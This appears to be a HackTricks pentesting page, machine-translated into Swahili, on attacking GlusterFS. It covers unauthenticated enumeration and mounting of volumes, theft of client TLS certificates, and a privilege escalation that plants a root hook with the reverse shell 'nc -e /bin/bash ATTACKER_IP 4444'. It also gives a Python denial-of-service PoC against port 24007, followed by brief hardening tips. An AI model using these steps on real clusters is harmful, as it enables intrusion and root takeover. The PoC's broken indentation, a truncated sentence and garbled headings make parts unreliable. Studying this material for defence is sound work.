# 24007-24008-24009-49152 - Pentesting GlusterFS

{{#include ../banners/hacktricks-training.md}}

## Basic Information

**GlusterFS** ni **mfumo wa faili ulio sambazwa** ambao unachanganya uhifadhi kutoka kwa seva nyingi katika **jina moja lililounganishwa**. Daemon ya usimamizi (`glusterd`) inasikiliza kwa default kwenye **24007/TCP** na inaagiza bricks za data-plane ambazo huanza kwenye **49152/TCP** (bandari moja kwa brick, ikiongezeka). Matoleo kabla ya 9.x yalitumia **24008–24009/TCP** kwa usafirishaji wa brick, hivyo bado utaona bandari hizo katika makundi ya urithi.
```
PORT      STATE  SERVICE        VERSION
24007/tcp open   glusterd       GlusterFS (RPC)
49152/tcp open   gluster-brick  SSL (TLS optional)
```
> Kidokezo: 24007 inajibu simu za RPC hata wakati nodi za kuhifadhi pekee **hazitoi** kiasi chochote; kwa hivyo huduma hii ni lengo la kuaminika ndani ya miundombinu mikubwa.

## Uhesabu

Sakinisha zana za mteja kwenye sanduku lako la shambulio:
```bash
sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu
```
1. **Ugunduzi wa wenzangu & afya**
```bash
# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
```
2. **Upelelezi wa kiasi**
```bash
# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
```
3. **Kuweka bila ruhusa**
```bash
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster
```
Ikiwa usakinishaji unashindwa, angalia `/var/log/glusterfs/<vol_name>-<uid>.log` upande wa mteja. Masuala ya kawaida ni:

* TLS enforcement (`option transport.socket.ssl on`)
* Address based access control (`option auth.allow <cidr>`)

### Ukarabati wa cheti

Pora faili zifuatazo kutoka kwa nodi yoyote ya mteja iliyoidhinishwa na uweke katika `/etc/ssl/` (au saraka iliyoonyeshwa katika kumbukumbu ya makosa):
```
/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca
```
---

## Uthibitisho wa Uthibitisho (2022-2025)

| CVE | Matoleo yaliyoathiriwa | Athari | Maelezo |
|-----|-------------------|--------|-------|
| **CVE-2022-48340** | 10.0–10.4, 11.0 | Tumia-baada-ya-kuachia katika `dht_setxattr_mds_cbk` inayoweza kufikiwa kupitia mtandao | **DoS** ya mbali na uwezekano wa RCE. Imerekebishwa katika 10.4.1 / 11.1. |
| **CVE-2023-26253** | < 11.0 | Kusoma nje ya mipaka katika FUSE notify handler | Kuanguka kwa mbali kupitia operesheni za FS zilizoundwa; PoC ya umma inapatikana. |
| **CVE-2023-3775** | < 10.5 / 11.1 | Uthibitisho usio sahihi wa ruhusa wakati wa kupandisha `gluster_shared_storage` | Inaruhusu mteja yeyote asiye na uthibitisho kupandisha kiasi cha admin – inasababisha **priv-esc** iliyoelezewa hapa chini. |

> Daima angalia `gluster --version` **katika kila node**; makundi tofauti ni ya kawaida baada ya sasisho za sehemu.

### Kutumia `gluster_shared_storage` (Kuongeza Haki)

Hata katika matoleo ya hivi karibuni, wasimamizi wengi wanaacha kiasi maalum cha `gluster_shared_storage` kuwa na uwezo wa kusomeka na kila mtu kwa sababu inarahisisha geo-replication. Kiasi hiki kina templates za cronjob ambazo zinafanya kazi na **root** katika kila node.
```bash
# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root
```
Ikiwa `hooks/1/` haipo, angalia `/ss_bricks/` – njia halisi inaweza kutofautiana na toleo kuu.

### Denial-of-Service PoC (CVE-2023-26253)
```python
#!/usr/bin/env python3
# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct
p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131",24007)) as s:
s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
s.send(p.get_buffer())
```
Kukimbia kwa script kunasababisha `glusterfsd` < 11.0.

---

## Kuimarisha & Ugunduzi

* **Sasisha** – LTS ya sasa ni 11.1 (Julai 2025). CVE zote zilizo juu zimefanyiwa marekebisho.
* Wezesha **TLS** kwa kila brick:

```bash
gluster volume set <vol> transport.socket.ssl on
gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
```
* Punguza wateja kwa orodha za CIDR:

```bash
gluster volume set <vol> auth.allow 10.0.0.0/24
```
* Funua bandari ya usimamizi 24007 tu kwenye **VLAN ya kibinafsi** au kupitia SSH tunnels.
* Angalia kumbukumbu: `tail -f /var/log/glusterfs/glusterd.log` na konfigura kipengele cha **audit-log** (`volume set <vol> features.audit-log on`).

---

## Marejeleo

* [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)
* [CVE-2023-26253 PoC – github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash)
{{#include ../banners/hacktricks-training.md}}